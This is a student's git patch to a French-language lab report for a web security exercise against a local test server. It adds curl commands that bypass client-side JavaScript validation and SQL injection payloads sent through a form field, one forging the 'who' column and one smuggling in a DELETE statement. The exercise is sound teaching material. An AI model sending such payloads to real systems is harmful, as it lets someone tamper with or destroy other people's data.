From 93de4e49416247b85491e4b7df3abdb70bf84744 Mon Sep 17 00:00:00 2001
From: "martin.birlouez.etu" <Monopolie/Patate*821>
Date: Wed, 26 Jan 2022 17:00:01 +0100
Subject: [PATCH] Q3 ok

---
 rendu.md | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/rendu.md b/rendu.md
index a64c454..ac5053a 100644
--- a/rendu.md
+++ b/rendu.md
@@ -18,7 +18,11 @@ Il ne peut etre efficace que si on ne peut pas modifier la page du site ce qui e
 * Votre commande curl
 
 En utilisant curl j'ai utiliser la commandee suivante :  
->curl localhost:8080 --data-raw "chaine=Ma Chaine Evoyer par Curl /*-+ &submit=O  
+>curl localhost:8080 --data-raw "chaine=Ma Chaine Evoyer par Curl /*-+ &submit=O
+
+ou 
+
+> curl -X POST -F "chaine=Ma propre chaine ?" localhost:8080
 
 Cela a permit d'envoyer cette chaine de caractére sans passez par la validation du Script.  
 
@@ -28,9 +32,14 @@ Le script Js ne peut donc jammais trouver le chanp a vérifier.
 
 ## Question 3
 
-* Votre commande curl pour effacer la table
+* Réalisez une injection SQL qui insérer une chaine dans la base de données, tout en faisant en sorte que le champ who 
+* soit rempli avec ce que vous aurez décidé (et non pas votre adresse IP). Verifiez que cela a fonctionné ensuite.
+curl -X POST -F "chaine=Hey','8.8.8.8') #" localhost:8080
 
 * Expliquez comment obtenir des informations sur une autre table
+Si ici a la place de la chaine on ajoute une requette par exemple :
+curl -X POST -F "chaine=Drop','8.8.8.8'); DELETE chaine WHERE 1=1 #" localhost:8080
+
 
 ## Question 4
 
-- 
GitLab